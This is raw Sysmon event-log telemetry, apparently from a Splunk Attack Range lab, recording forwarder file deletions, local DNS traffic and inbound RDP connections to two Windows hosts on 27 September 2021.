Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F56957C0A0278896A259181D5A88FE04,SHA256=CB797D54F2B973DCAF844670249541A68B3E249250C27D000BBBACCAA2BB366E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:54.205{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B43E72895BD951B6AE70782A5712B7E,SHA256=C2DCD348AEA26F7ADACB1540AE8877D9C10B12C5176BB18E229CFC62409792BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:51.427{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52923-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:54.043{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E650A1EE2128B57EE35DD6D8D650A866,SHA256=908A3868194AD936C724551C9F8EF397470C6FA94E15477840BFA13A78344DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:55.377{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B002080A1FAC270A2F9E29E3CA19FB3F,SHA256=3EC38D7A615842B90CECC668E53F45884FD51FAB0CDD130157FA36B3632AA8BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:55.205{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E439C4F7FABCD97369E4736F83886D8D,SHA256=176501C1681B29B30635585DFA48340D4F5189CD25B5927D87307DB3AF59595A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:55.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=348F4ACF79161E12C8E855DF6CB558A8,SHA256=04F1A91D34732D3FD2718B57F3AAFFF49F6DE0858E0D6CE2D7BFEEF176F400D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:55.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86247CF35D2BE2A6D23A0932A9087874,SHA256=146D10DE157A9280CC3EF43FB7D3EB9B246F6D34A3733B51F3DF9914D42231B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:55.059{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB67D64A6AF9864823D1C350F2875E83,SHA256=DA331D0083E843351703C32A3C5189DA96AA220B9C6DFCEAD91BCEB59A21059A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:56.439{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE0612C00523252E3F11AAAB7E3F9984,SHA256=CC9D7BD34E7D03B7C4B524AB4C37DADD51221662DE70E58C614DF2E00F9D5B8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:56.059{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA6E4E18EB778A5DA01E043CA0DF6A8,SHA256=B6452329D17FF17A1655EE2CE493C457B3A0B6CD6A6FFBDFF782F42D9BC0CE0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:54.072{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.145unn-212-102-34-145.datapacket.com57359-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001058010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:53.823{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51266- 354300x80000000000000001058009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:53.010{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001058014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:57.861{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0711DC303055A10F6E17993FC668991F,SHA256=A909EC356FA46C0FFB50BA8EC46512CB7574C2C766FC5C487BC4F6F65CB4999C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:57.486{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4795CD88B1BFED8EE2DEA3DAF57FF8BD,SHA256=C313D33A1FAAC753C4CFB1C4295EA10675C51E9DCFA0E2C547CE07F3BC6CA7D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:54.835{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59600-false10.0.1.12-8000- 23542300x8000000000000000982328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:57.075{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079CCD306BE7F146ECA7FE4477464538,SHA256=2CAC28A9FCBA2E874286BB17A1C6EFAA79D10F37B4104DE4692967E648A5A777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:58.721{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C18A98FC091A262478E9A8FFEBA69BC,SHA256=298E193DF588CFBB18CF57E500F2D40BAF1D050CDF65D3382311424E0585EB05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982332Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:55.186{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com55125-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982331Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:58.075{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BCDC5E23D5668EC1DF1368BB09830D7,SHA256=B0F3B0FA60570DE9BCC7406046209153326FAF255E40E767DF7D0350DAA67826,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:56.436{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.243-18423-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001058015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:55.854{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56498- 23542300x8000000000000000982330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:58.059{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=348F4ACF79161E12C8E855DF6CB558A8,SHA256=04F1A91D34732D3FD2718B57F3AAFFF49F6DE0858E0D6CE2D7BFEEF176F400D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:59.736{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B75DBCE05AC6382310AD4ECDDF38E4,SHA256=BCBF6CC9E22E7B9CF7E749C1E17ABCD78DA198033E9240FD4B793D9630A8599F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982335Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:56.970{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63227-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982334Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:59.700{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=323834A31C35B70918EC6FB846576F45,SHA256=9624FD4F2FF42111CE998494BC09F70DBB61920EA821AC2958F4A61CEFFD0642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982333Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:59.090{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2955EA9B6140231AFF9A192A8C039A3A,SHA256=BDEB6B863A480DCBD2A6A6FDB235FA249E388B378FFAA871D6F10711C81A2E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:00.736{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D24B5165B0E88E87B435920C9E7B706,SHA256=8F2AED28F3A7BB8D4F2AD98F9F00170B4C0D5FC6DA19B45E2E34C511C3C1B606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982336Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:00.106{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FE30B5ADEE217721F6A28DE147D8AB,SHA256=F25BFCA7347DDF7D988ECC9354EAB80E6483FC1116D1AA7E872F9A95546365BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:00.643{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4537C89615ECB388FD9E4AA728CE77F2,SHA256=148BAED9E6E5F00E7776BD1CBAE49CC6C6284BAF70CC24F14A23851B49532FA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:58.136{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54326-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001058023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:01.737{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D04802F123D47B387F58D848D6903B4,SHA256=252D1CCFA8A3A9F2D20229554D17828581433905FAEFC32D13BC74FCA243293F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982339Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:58.724{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com16145-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982338Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:01.403{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B74338BF48C2BF0FF1BCD3FE27BD3913,SHA256=040BB638D343A619DE3F0802AEA1B4EB46A590A66DCBD944819EFA5BC7848543,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982337Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:01.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93944B75AE7EDB0AC8A252C0B8E41E9C,SHA256=163467E2BD0A27A429FB115450DA7449E69894968D010340787892FBB39136E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:01.580{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3816C328AA40FC892EEA4F272FED754,SHA256=06DA09C41DD559426F8F3F19960DA0086D3296AEB07E37C1F47451E93BFE232B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:02.752{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95DC1EE659294F6D30C4A584263CC500,SHA256=7CF7A27587F356441306524E30251AE73B5E2F781E98E50774EB6C47864604CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:59.972{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58429-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:02.856{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34552200F792466D449CA839AA95860D,SHA256=00C9DC32E53E31EFDB18722A8808E2CE81DF1F87613CBFBD16309E779D378711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:02.137{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC18EB93A52A0EDE434A377EC690C317,SHA256=7267C0646D45B04135259825C86E5E3629A4805EC497C7AB266949487AD95613,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:59.999{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57619-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001058026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:03.757{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F459D2C44C4551E0D16E074FE09C5DD8,SHA256=3ADE8BA436860EF53B9872B9CD6F92AE602FC306454BEC9368D71313F80ED642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:03.153{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FD45435133E7311C2CDF25BB883E13C,SHA256=E19451B8F1B28CCAD024CE9CB76F08A42DA33C5FB27C0636D03750EE1E52DC0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001058027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:04.757{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E0C2E1D01C1F4674B1051355B26FCF2,SHA256=17924F1A75F0BE815EF64310759B7AD3EAE89A173C7B14F5A1BFD7B85BE870A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:04.157{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80B875DCD5416F5BB3D4E8B9E2DC00A5,SHA256=8639A10D9ADEFEBC273F6788D39BA3562352C061BC1E8EA621D8E75FC5E9BAAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:00.804{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59601-false10.0.1.12-8000- 354300x8000000000000000982344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:00.517{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de54397-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001058028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:05.757{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64568385512C268356101E3045B12D5,SHA256=482BEE2FEC59F456C909BB134D883A74115C566A5BE2C358C937316DC5E5D8D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:05.158{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF8B64FC3353C79A3DFB3A2CF8AA1889,SHA256=F94C46FC48E87FEAFCFBF48E0888991C75D036F80D530C9B0F7713A9B50F4FBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:29:06.204{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D45BD50AB190BD533F0D53251EAF9B9,SHA256=46283142B1F46C030652704D7B309919C6874FDD376A68C350596048FF15B423,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001058029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:29:03.953{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54327-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000-